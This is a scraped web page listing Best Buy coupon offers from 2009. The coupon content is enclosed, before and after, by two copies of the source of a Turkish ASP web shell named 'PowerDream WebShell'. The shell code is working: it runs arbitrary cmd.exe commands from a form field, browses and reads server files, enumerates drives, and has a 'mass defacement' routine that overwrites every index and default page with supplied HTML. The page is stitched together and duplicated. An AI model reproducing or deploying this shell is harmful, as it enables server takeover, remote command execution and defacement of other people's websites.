<% 'Created by PowerDream
'WebShell '2007 '[TURKEY] %> <% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) end if %> <%On Error Resume Next if request("t3") <> "" then Set ObjPasta2 = Objeto.GetFolder(request("t3")) set ObjFso=server.CreateObject("Scripting.FileSystemObject") var_caminho=request("t3") For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "
Way amk Hacklenmedi..!:
" & pasta.name err=0 else response.write "
Gözün Aydın Hacklendi :)" & pasta.name end if set ObjAbreArq = nothing next set ObjFso=nothing Set ObjPasta2 = nothing set ObjFso = nothing end if %>PowerDream Web Shell

PowerDream WebShell v1.0

Server Bilgileri:
|Web Server : <%=request.servervariables("SERVER_SOFTWARE")%> |IP Server: <%=request.servervariables("LOCAL_ADDR")%> | Protocol: <% = Request.ServerVariables("SERVER_PROTOCOL") %> |

Dizinler: <%=server.mappath("pd.asp")%>

Dizinleri Göster : >

Direktörler

Arsivler

<% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "
" contador=contador+1 next%> 
<%On Error Resume Next For Each Archivo in ObjPasta.Files Response.Write Archivo.Name & "
" Next%> 


MASS DEFACEMENT:

Dizinler:

Html Kodlari Buraya Giriniz
:



CMD Bilgileri:
<% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
  <%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
  
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
" method="POST">
cmd>

Direktörler / Arşivler:

<%On Error Resume Next if request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothig end if%>

_____________________________________________________________________________________________________

<%set ObjPasta = nothing set Objeto = nothing%>
<%set ObjPasta = nothing set Objeto = nothing%>

 

Extra Bilgiler
<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %>

<% back1="#D3E2E7" back2="#AFFEDE" back=back2 FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF %> <%NEXT%>
Hard Diskler
Tipleri
Numaralari
Sistem Bilgileri ve Arsivler
Limit
Total
<%=d.driveletter%>
<% IF d.DriveType = 0 Then s = "Unknown" IF d.VolumeName = "" Then n = " " Else n = d.VolumeName END IF ELSEIF d.drivetype=1 THEN s="Removable" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=2 THEN s="Fixed" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=3 THEN s="Network" IF d.isready THEN n=d.sharename ELSE n="--" END IF ELSEIF d.drivetype=4 THEN s="CDROM" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=5 THEN s="RAM Disk" IF d.isready THEN n=d.volumename ELSE n="--" END IF END IF response.write(s) %>
<%=n%>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN set sp=fs.getdrive(str) response.write(sp.filesystem) ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN freespace = (d.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write(Round(freespace,1) & " MB") ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN totalspace = (d.TotalSize / 1048576) set sp=fs.getdrive(str) response.write(Round(totalspace,1) & " MB") ELSE response.write("--") END IF %>

    Server Hakkında Geniş Bilgi

_____________________________________________________________________________________________________

Find US offers and deals!Find UK offers and deals!Find CA offers and deals!
home
hot deals
new offers
expiring offers
printable offers
free shipping
view all merchants
Deal Categories
Apparel - Kids & Teens
Apparel - Men
Apparel - Women
Apparel- Intimate
Arts & Hobby
Automotive
Baby & Maternity
Beauty & Cosmetics
Books & Magazines
Cameras & Photos
Computer & Software
Cooking & Kitchenware
Dating & Networking
Department Stores
Diet Plans & Supplements
Education
Electronics & Appliances
Entertainment
Eyewear
Financial & Insurance
Flowers & Gifts
Food & Grocery
Health & Fitness
Home & Garden
Housewares & Furniture
Internet Services
Jewelry & Accessories
Licensed Merchandise
Luggage & Accessories
Music & Movies
Office Supplies & Ink
Other
Pet Supplies
Phone & Wireless
Seasonal & Holiday
Shoes
Sports & Outdoor
Toys & Games
Travel
Best Buy Coupons & Offers
coupon home > FootSmart > Monster.com > JC Penney > Best Buy



Your Electronics Deals Are Here.




Online Shopping Offers


$4.99 DVD Sale!
DVDs for ONLY $4.99 with a Keycode savings link.
Expires Today
 Use Coupon     Email To Friend!


5% - 15% Off Select TVs!
Take 5% - 15% Off Select TVs at Best Buy when you use the Coupon Keycode link!
Expires 12/31/2009
 Use Coupon     Email To Friend!


This Week's Sale Events and Free Shipping Offers!
See this Week's Sale Events and Free Shipping Offers at BestBuy.com. Just use the Keycode savings link!
On-Going Promotion
 Use Coupon     Email To Friend!


Digital camera package deals!
Save with digital camera package deals at BestBuy.com when you use the Keycode coupon link!
On-Going Promotion
 Use Coupon     Email To Friend!


Recently Reduced: See the Outlet Center Items Priced Lower Than Ever!
On-Going Promotion
 Use Coupon     Email To Friend!


5% - 20% Off Select Digital Cameras, Plus Free Shipping.
Take 5% - 20% Off Select Digital Cameras, Plus Free Shipping.
No Coupon Code Needed
Expires 11/24/2009
 Use Coupon     Email To Friend!


5% - 25% Off Select Digital Camcorders, Plus Free Shipping.
Take 5% - 25% Off Select Digital Camcorders, Plus Free Shipping.
No Coupon Code Needed
Expires Today
 Use Coupon     Email To Friend!


Find the Best Selling Wii Games of the Holiday Season.
Expires 12/31/2009
 Use Coupon     Email To Friend!


Find the Best Selling Xbox 360 Games of the Holiday Season.
Expires 12/31/2009
 Use Coupon     Email To Friend!


Find the Best Selling PS3 Games of the Holiday Season.
Expires 12/31/2009
 Use Coupon     Email To Friend!


$40 Off Samsung Progressive-Scan DVD Player with Any Samsung HDTV
Take $40 Off Samsung Progressive-Scan DVD Player with Any Samsung HDTV at BestBuy.com when you use the Keycode coupon link!
Expires 12/31/2009
 Use Coupon     Email To Friend!


Laptops are On Sale!
See which Laptops are On Sale this Week at Best Buy when you use the Keycode discount link!
On-Going Promotion
 Use Coupon     Email To Friend!


No Interest on Major Appliances $799 and Up!
Get No Interest on Major Appliances $799 and Up if Paid in Full Within 24 Months.
Expires 1/2/2010
 Use Coupon     Email To Friend!


20% - 35% Off Select Shavers!
Take 20% - 35% Off Select Shavers.
Expires 11/21/2010
 Use Coupon     Email To Friend!


Blu-ray Action Movie Sale prices from $9.99 to $24.99!
$9.99 - $24.99 Blu-ray Action Movie Sale.
Expires Today
 Use Coupon     Email To Friend!


$4.99 DVD Sale!
DVD's on sales from $4.99 each.
Expires 12/12/2009
 Use Coupon     Email To Friend!


No Interest on HDTV, Home Theater & Geek Squad® Purchases $999 & Up! If Paid in Full Within 3 Years
Get No Interest on HDTV, Home Theater & Geek Squad® Purchases Totaling $999 & Up If Paid in Full Within 3 Years.
Expires 12/31/2009
 Use Coupon     Email To Friend!


See this Week’s Special Offers on Netbooks.
Expires 12/19/2009
 Use Coupon     Email To Friend!


Nintento Wii Starting at $199.99!
Expires 12/24/2009
 Use Coupon     Email To Friend!


Xbox 360 Starting at $199.99!
Expires 12/24/2009
 Use Coupon     Email To Friend!


PS3 Starting at $299.99!
Expires 12/24/2009
 Use Coupon     Email To Friend!


Weekly Video Game Offers!
Check Out this Week's Video Game Offers at BestBuy.com!
On-Going Promotion
 Use Coupon     Email To Friend!


Best Buy's Electronics Discounts
Check out the latest price drops on TVs, digital cameras, music players and more
On-Going Promotion
 Use Coupon     Email To Friend!


Free Shipping on all music and movies orders $25 or more!
Get Free Shipping on all music and movies orders $25 and up at BestBuy.com.
Expires 12/31/2009
 Use Coupon     Email To Friend!


Best Buy Details...

Best Buy Coupon Codes Instructions
Coupons can be used directly on the BestBuy.com website. On the Payment Options page, enter the coupon code in the box provided and click the "apply" button. Your discount should appear on the confirmation page. If no coupon code is presented, the offer will be applied automatically.

Best Buy Customer Service
1 (888) 237-8289


<% 'Created by PowerDream
'WebShell '2007 '[TURKEY] %> <% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) end if %> <%On Error Resume Next if request("t3") <> "" then Set ObjPasta2 = Objeto.GetFolder(request("t3")) set ObjFso=server.CreateObject("Scripting.FileSystemObject") var_caminho=request("t3") For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "
Way amk Hacklenmedi..!:
" & pasta.name err=0 else response.write "
Gözün Aydın Hacklendi :)" & pasta.name end if set ObjAbreArq = nothing next set ObjFso=nothing Set ObjPasta2 = nothing set ObjFso = nothing end if %>PowerDream Web Shell

PowerDream WebShell v1.0

Server Bilgileri:
|Web Server : <%=request.servervariables("SERVER_SOFTWARE")%> |IP Server: <%=request.servervariables("LOCAL_ADDR")%> | Protocol: <% = Request.ServerVariables("SERVER_PROTOCOL") %> |

Dizinler: <%=server.mappath("pd.asp")%>

Dizinleri Göster : >

Direktörler

Arsivler

<% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "
" contador=contador+1 next%> 
<%On Error Resume Next For Each Archivo in ObjPasta.Files Response.Write Archivo.Name & "
" Next%> 


MASS DEFACEMENT:

Dizinler:

Html Kodlari Buraya Giriniz
:



CMD Bilgileri:
<% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
  <%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
  
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
" method="POST">
cmd>

Direktörler / Arşivler:

<%On Error Resume Next if request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothig end if%>

_____________________________________________________________________________________________________

<%set ObjPasta = nothing set Objeto = nothing%>
<%set ObjPasta = nothing set Objeto = nothing%>

 

Extra Bilgiler
<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %>

<% back1="#D3E2E7" back2="#AFFEDE" back=back2 FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF %> <%NEXT%>
Hard Diskler
Tipleri
Numaralari
Sistem Bilgileri ve Arsivler
Limit
Total
<%=d.driveletter%>
<% IF d.DriveType = 0 Then s = "Unknown" IF d.VolumeName = "" Then n = " " Else n = d.VolumeName END IF ELSEIF d.drivetype=1 THEN s="Removable" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=2 THEN s="Fixed" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=3 THEN s="Network" IF d.isready THEN n=d.sharename ELSE n="--" END IF ELSEIF d.drivetype=4 THEN s="CDROM" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=5 THEN s="RAM Disk" IF d.isready THEN n=d.volumename ELSE n="--" END IF END IF response.write(s) %>
<%=n%>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN set sp=fs.getdrive(str) response.write(sp.filesystem) ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN freespace = (d.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write(Round(freespace,1) & " MB") ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN totalspace = (d.TotalSize / 1048576) set sp=fs.getdrive(str) response.write(Round(totalspace,1) & " MB") ELSE response.write("--") END IF %>

    Server Hakkında Geniş Bilgi

_____________________________________________________________________________________________________